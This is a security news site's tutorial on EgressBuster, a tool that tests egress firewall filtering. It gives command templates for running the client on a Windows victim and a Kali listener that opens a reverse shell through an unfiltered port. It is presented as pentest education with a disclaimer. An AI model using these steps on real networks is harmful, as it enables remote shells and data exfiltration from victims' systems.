Friday, December 27, 2024
HomeExploitation ToolsEgressBuster - A Pentesting Tool to Compromise Victim via Command &...

EgressBuster – A Pentesting Tool to Compromise Victim via Command & Control using Firewall

Published on

SIEM as a Service

Network Firewalls acts as a fortification to keep the internal corporate network secure. Many people often think as it is protecting a device from incoming traffic. Most outbound connections are insecure without egress traffic filtering.

If Egress Traffic Filtering failed then attackers bypass the firewall to command and control the external network

Egress filters out traffic leaving your network and restricts your internal users from getting off of your network and going anywhere they would like(Different Network). So, egress traffic filtering help in mitigating data exfiltration from your networked assets.

- Advertisement - SIEM as a Service

While performing the penetration test, companies do special exceptions to ports to prevent access to the outside Internet. So Egressbuster will test the effectiveness of egress filtering in an environment. Download EgressBuster Here.

Let’s see how to work with EgressBuster to bypass Firewall and how we should Get Shell.

Also Read Net Creds-Sniff out the Username and Password of Users in your Network

Victim Machine (Windows 10):

  • Run and execute a command: egressbuster.exe <External Attackers Listening Ip> <Range of ports> shell
  • Now It will be sending TCP packets on each and every port originating from inside the firewall to externally facing server listening ports.
  • The external facing server is the Kali Linux attackers machine.

Note: If the corporate network is secured with Firewall Best practices on Egress Traffic Filtering it should not allow access to the external network. If Egress Traffic Filtering failed It permits command and control to the external network.

Attackers Machine(Kali Linux):

  • Listener outside the network uses iptables to listen on all 65k ports for a connection.
Bypass Firewall
  • Execute the command: ./egress_listener.py <Kali Linux Ip or Attackers Ip> <Select Interface> <Victims Ip> shell
  • Once the Victims Internal network is not effective in egress filtering. Here we should Get Shell!

Obtained Victims Machine – Bypass Firewall

  • The victims network opened with port 1090/tcp and forwarded to the external network due to a lack of egress filtering.
  • Connection established successfully to a shell, let us inject commands.
  • Now the attacker can perform all attacks on the internal network.

Attackers can use these techniques to collect and forward sensitive information from your network or to attack or spam other networks.Test the effectiveness of egress filtering in your network with EgressBuster. Happy Hacking !!!

Disclaimer

This article is only for Educational purposes. Any actions and or activities related to the material contained within this Website are solely your responsibility. The misuse of the information on this website can result in criminal charges brought against the persons in question. The authors and www.gbhackers.com will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

You can follow us on LinkedinTwitter, and Facebook for daily Cybersecurity updates also you can take the Best Cybersecurity course online to keep yourself updated.

Latest articles

Lumma Stealer Attacking Users To Steal Login Credentials From Browsers

Researchers observed Lumma Stealer activity across multiple online samples, including PowerShell scripts and a...

New ‘OtterCookie’ Malware Attacking Software Developers Via Fake Job Offers

Palo Alto Networks reported the Contagious Interview campaign in November 2023, a financially motivated...

NjRat 2.3D Pro Edition Shared on GitHub: A Growing Cybersecurity Concern

The recent discovery of the NjRat 2.3D Professional Edition on GitHub has raised alarms...

Palo Alto Networks Vulnerability Puts Firewalls at Risk of DoS Attacks

A critical vulnerability, CVE-2024-3393, has been identified in the DNS Security feature of Palo...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

ConvoC2 – A Red Teamers Tool To Execute Commands on Hacked Hosts Via Microsoft Teams

A stealthy Command-and-Control (C2) infrastructure Red Team tool named ConvoC2 showcases how cyber attackers...

Cloudflare Developer Domains Abused For Cyber Attacks

Cloudflare Pages, a popular web deployment platform, is exploited by threat actors to host...

Hackers Cloning Websites, Exploiting RCE Flaws To Gain Access To Shopping Platforms

Cybercriminals are leveraging AI-powered phishing attacks, website cloning tools, and RCE exploits to target...